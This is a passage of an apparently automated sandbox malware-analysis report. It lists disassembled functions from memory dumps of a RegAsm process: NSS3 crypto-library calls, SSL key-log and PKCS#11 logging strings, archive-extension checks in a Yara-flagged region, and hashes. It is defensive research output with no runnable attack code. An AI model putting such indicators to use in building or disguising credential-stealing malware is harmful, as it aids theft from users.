                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 759471828-0
                                                                                                        • Opcode ID: cd77a71143bb26e135b3745c0f9741b86e379e36244652961f0dd6466925e2be
                                                                                                        • Instruction ID: cbbea3afca21f2b9ed5c54c4a8c987b76ec7d549afe451c51b8827a1718aad7b
                                                                                                        • Opcode Fuzzy Hash: cd77a71143bb26e135b3745c0f9741b86e379e36244652961f0dd6466925e2be
                                                                                                        • Instruction Fuzzy Hash: 1AB15875A002059FEB00EF68D944BAA77F8FF15318F044129ED2597B41E734E962CBE1
                                                                                                        Function 6C246E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C246BF7), ref: 6C246EB6
                                                                                                          • Part of subcall function 6C1A1240: TlsGetValue.KERNEL32(00000040,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A1267
                                                                                                          • Part of subcall function 6C1A1240: EnterCriticalSection.KERNEL32(?,?,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A127C
                                                                                                          • Part of subcall function 6C1A1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A1291
                                                                                                          • Part of subcall function 6C1A1240: PR_Unlock.NSS3(?,?,?,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A12A0
                                                                                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C2EFC0A,6C246BF7), ref: 6C246ECD
                                                                                                        • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C246EE0
                                                                                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C246EFC
                                                                                                        • PR_NewLock.NSS3 ref: 6C246F04
                                                                                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C246F18
                                                                                                        • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C246BF7), ref: 6C246F30
                                                                                                        • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C246BF7), ref: 6C246F54
                                                                                                        • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C246BF7), ref: 6C246FE0
                                                                                                        • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C246BF7), ref: 6C246FFD
                                                                                                        Strings
                                                                                                        • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C246FF8
                                                                                                        • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C246FDB
                                                                                                        • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C246EF7
                                                                                                        • SSLKEYLOGFILE, xrefs: 6C246EB1
                                                                                                        • SSLFORCELOCKS, xrefs: 6C246F2B
                                                                                                        • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C246F4F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                        • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                        • API String ID: 412497378-2352201381
                                                                                                        • Opcode ID: 4c113175d6b36ea9cc8d77af34b29e290586214d49a247d0611d2a8b21b53eba
                                                                                                        • Instruction ID: bff4b4fbbb011cb6405d7e38f3ce691864ae13c233c6ee042632a5e6638a5888
                                                                                                        • Opcode Fuzzy Hash: 4c113175d6b36ea9cc8d77af34b29e290586214d49a247d0611d2a8b21b53eba
                                                                                                        • Instruction Fuzzy Hash: CDA138B2A758898BE718473CC802B843AB6AB9772AF58C365FC31C6ED5DF759450C281
                                                                                                        Function 6C21E8C0 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 353memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PORT_ZAlloc_Util.NSS3(0000001C,?,6C21E853,?,FFFFFFFF,?,?,6C21B0CC,?,6C21B4A0,?,00000000), ref: 6C21E8D9
                                                                                                          • Part of subcall function 6C210D30: calloc.MOZGLUE ref: 6C210D50
                                                                                                          • Part of subcall function 6C210D30: TlsGetValue.KERNEL32 ref: 6C210D6D
                                                                                                          • Part of subcall function 6C21C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C21DAE2,?), ref: 6C21C6C2
                                                                                                        • PORT_ArenaMark_Util.NSS3(?), ref: 6C21E972
                                                                                                        • PORT_ArenaMark_Util.NSS3(?), ref: 6C21E9C2
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C21EA00
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C21EA3F
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C21EA5A
                                                                                                        • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C21EA81
                                                                                                        • SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6C21EA9E
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C21EACF
                                                                                                        • PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6C21EB56
                                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C21EBC2
                                                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6C21EBEC
                                                                                                        • free.MOZGLUE(00000000), ref: 6C21EC58
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
                                                                                                        • String ID: S!l
                                                                                                        • API String ID: 759478663-3511714027
                                                                                                        • Opcode ID: 313b02c7dd26a6852a04a995ef4cadeac0f38008831539762206a7188aa0f2be
                                                                                                        • Instruction ID: 33bda71efd15408153206ac349d65614900c4eb38a7f1bc7ba6434032049fb1f
                                                                                                        • Opcode Fuzzy Hash: 313b02c7dd26a6852a04a995ef4cadeac0f38008831539762206a7188aa0f2be
                                                                                                        • Instruction Fuzzy Hash: 8AC15FB1A0520A9BEB10CF69DC85BAA77F4BF08318F140069EE1697F51E731E945CBD1
                                                                                                        Function 004139C2 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 127stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcessstrtok_s
                                                                                                        • String ID: DwA$block
                                                                                                        • API String ID: 3407564107-4170876926
                                                                                                        • Opcode ID: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
                                                                                                        • Instruction ID: 9e2abf34b02cddae1b0fa04c6dc88f1d30775994422634f8dc56bb1647053282
                                                                                                        • Opcode Fuzzy Hash: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
                                                                                                        • Instruction Fuzzy Hash: 7B414F70A48306BBEB44DF60DC49E9A7B6CFB1870BB206166E402D2151FB39B781DB58
                                                                                                        Function 6C1E4E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C1E4E83
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E4EB8
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E4EC7
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E4EDD
                                                                                                        • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C1E4F0B
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E4F1A
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E4F30
                                                                                                        • PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C1E4F4F
                                                                                                        • PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C1E4F68
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$n,l
                                                                                                        • API String ID: 1003633598-1170522481
                                                                                                        • Opcode ID: c104314995a6ce5f235118a220e136e4b37967b522e1b0b838f7e29789cc18f3
                                                                                                        • Instruction ID: bf131352265da793bd8374fed7c1d05c0e9ce7643021350e48f90028f6aeddb9
                                                                                                        • Opcode Fuzzy Hash: c104314995a6ce5f235118a220e136e4b37967b522e1b0b838f7e29789cc18f3
                                                                                                        • Instruction Fuzzy Hash: 7B412774701148AFDB00DF94DD89F9A37B9EB5671DF054068FC0897E11DB39A908CBA2
                                                                                                        Function 6C1E4CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C1E4CF3
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E4D28
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E4D37
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E4D4D
                                                                                                        • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C1E4D7B
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E4D8A
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E4DA0
                                                                                                        • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C1E4DBC
                                                                                                        • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C1E4E20
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$n,l
                                                                                                        • API String ID: 1003633598-1352789624
                                                                                                        • Opcode ID: 3b8045c441a7ee2e694650b9f9dfb0740af9df8b01ad73c30947be422e7417af
                                                                                                        • Instruction ID: 0913d6725531f8c2dc780d0d52abecfc93102f93d9a1cd36eb1a7ffa7339783a
                                                                                                        • Opcode Fuzzy Hash: 3b8045c441a7ee2e694650b9f9dfb0740af9df8b01ad73c30947be422e7417af
                                                                                                        • Instruction Fuzzy Hash: C0412575600248AFDB00DF90DD89BAA37B9FB5A71DF054028FC08ABE11DB359858CB92
                                                                                                        Function 6C1E2F00 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 110COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_SetPIN), ref: 6C1E2F26
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E2F54
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E2F63
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E2F79
                                                                                                        • PR_LogPrint.NSS3( pOldPin = 0x%p,?), ref: 6C1E2F9A
                                                                                                        • PR_LogPrint.NSS3( ulOldLen = %d,?), ref: 6C1E2FB5
                                                                                                        • PR_LogPrint.NSS3( pNewPin = 0x%p,?), ref: 6C1E2FCE
                                                                                                        • PR_LogPrint.NSS3( ulNewLen = %d,?), ref: 6C1E2FE7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: hSession = 0x%x$ pNewPin = 0x%p$ pOldPin = 0x%p$ ulNewLen = %d$ ulOldLen = %d$ (CK_INVALID_HANDLE)$C_SetPIN$n,l
                                                                                                        • API String ID: 1003633598-2918854871
                                                                                                        • Opcode ID: 377fef9248785caf7ef59aefca2093d5165631dc60b9867dda243c070a4c97d4
                                                                                                        • Instruction ID: df5c0fab872e517d7a234c14d1eabbf6ef125beb4dba78d3da16fa72c6a9cf6f
                                                                                                        • Opcode Fuzzy Hash: 377fef9248785caf7ef59aefca2093d5165631dc60b9867dda243c070a4c97d4
                                                                                                        • Instruction Fuzzy Hash: 9B312475601249AFCB00CF54DD4DF8A37B5EB4B729F484164FC08A7A11DB319808CB92
                                                                                                        Function 0041B870 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(00000000,759183C0,00000000,0041C55B,?), ref: 0041B875
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,0043613C), ref: 0041B8A3
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.zip), ref: 0041B8B3
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.zoo), ref: 0041B8BF
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.arc), ref: 0041B8CB
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.lzh), ref: 0041B8D7
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.arj), ref: 0041B8E3
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.gz), ref: 0041B8EF
                                                                                                        • StrCmpCA.SHLWAPI(759183C0,.tgz), ref: 0041B8FB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen
                                                                                                        • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                        • API String ID: 1659193697-51310709
                                                                                                        • Opcode ID: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
                                                                                                        • Instruction ID: 4d0ab467417de3272ea9e1328912bf8f077e80ad604b43416a02b9711c478325
                                                                                                        • Opcode Fuzzy Hash: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
                                                                                                        • Instruction Fuzzy Hash: 41015239A89227B56A223631AD81FBF1E5C8D86F807151037E845A2188DB5C998355FD
                                                                                                        Function 6C2428C0 Relevance: 27.2, APIs: 18, Instructions: 230COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C245B40: PR_GetIdentitiesLayer.NSS3 ref: 6C245B56
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C24290A
                                                                                                        • EnterCriticalSection.KERNEL32(00000001), ref: 6C24291E
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C242937
                                                                                                        • EnterCriticalSection.KERNEL32(00000001), ref: 6C24294B
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242966
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C2429AC
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C2429D1
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C2429F0
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242A15
                                                                                                        • PR_EnterMonitor.NSS3(?), ref: 6C242A37
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242A61
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242A78
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242A8F
                                                                                                        • PR_ExitMonitor.NSS3(?), ref: 6C242AA6
                                                                                                          • Part of subcall function 6C279440: TlsGetValue.KERNEL32 ref: 6C27945B
                                                                                                          • Part of subcall function 6C279440: TlsGetValue.KERNEL32 ref: 6C279479
                                                                                                          • Part of subcall function 6C279440: EnterCriticalSection.KERNEL32 ref: 6C279495
                                                                                                          • Part of subcall function 6C279440: TlsGetValue.KERNEL32 ref: 6C2794E4
                                                                                                          • Part of subcall function 6C279440: TlsGetValue.KERNEL32 ref: 6C279532
                                                                                                          • Part of subcall function 6C279440: LeaveCriticalSection.KERNEL32 ref: 6C27955D
                                                                                                        • PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6C242AF9
                                                                                                        • free.MOZGLUE(?), ref: 6C242B16
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C242B6D
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C242B80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
                                                                                                        • String ID:
                                                                                                        • API String ID: 2841089016-0
                                                                                                        • Opcode ID: 03ce56e4cbe4c7dfb53d160e34fd7ccca66185abdade4d0eaa745e230d12e18a
                                                                                                        • Instruction ID: e70ac62a3dd897c241d529fda7a0cb1572d524abe5041552ee52c7865a1884b3
                                                                                                        • Opcode Fuzzy Hash: 03ce56e4cbe4c7dfb53d160e34fd7ccca66185abdade4d0eaa745e230d12e18a
                                                                                                        • Instruction Fuzzy Hash: AB81B3F5A007095BE7249F35EC49797B7F8AF11308F048928EC5AC6A11EB31E528CB52
                                                                                                        Function 6C208E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C208E01,00000000,6C209060,6C310B64), ref: 6C208E7B
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C208E01,00000000,6C209060,6C310B64), ref: 6C208E9E
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(6C310B64,00000001,?,?,?,?,6C208E01,00000000,6C209060,6C310B64), ref: 6C208EAD
                                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C208E01,00000000,6C209060,6C310B64), ref: 6C208EC3
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C208E01,00000000,6C209060,6C310B64), ref: 6C208ED8
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C208E01,00000000,6C209060,6C310B64), ref: 6C208EE5
                                                                                                        • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C208E01), ref: 6C208EFB
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C310B64,6C310B64), ref: 6C208F11
                                                                                                        • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C208F3F
                                                                                                          • Part of subcall function 6C20A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C20A421,00000000,00000000,6C209826), ref: 6C20A136
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C20904A
                                                                                                        Strings
                                                                                                        • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C208E76
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
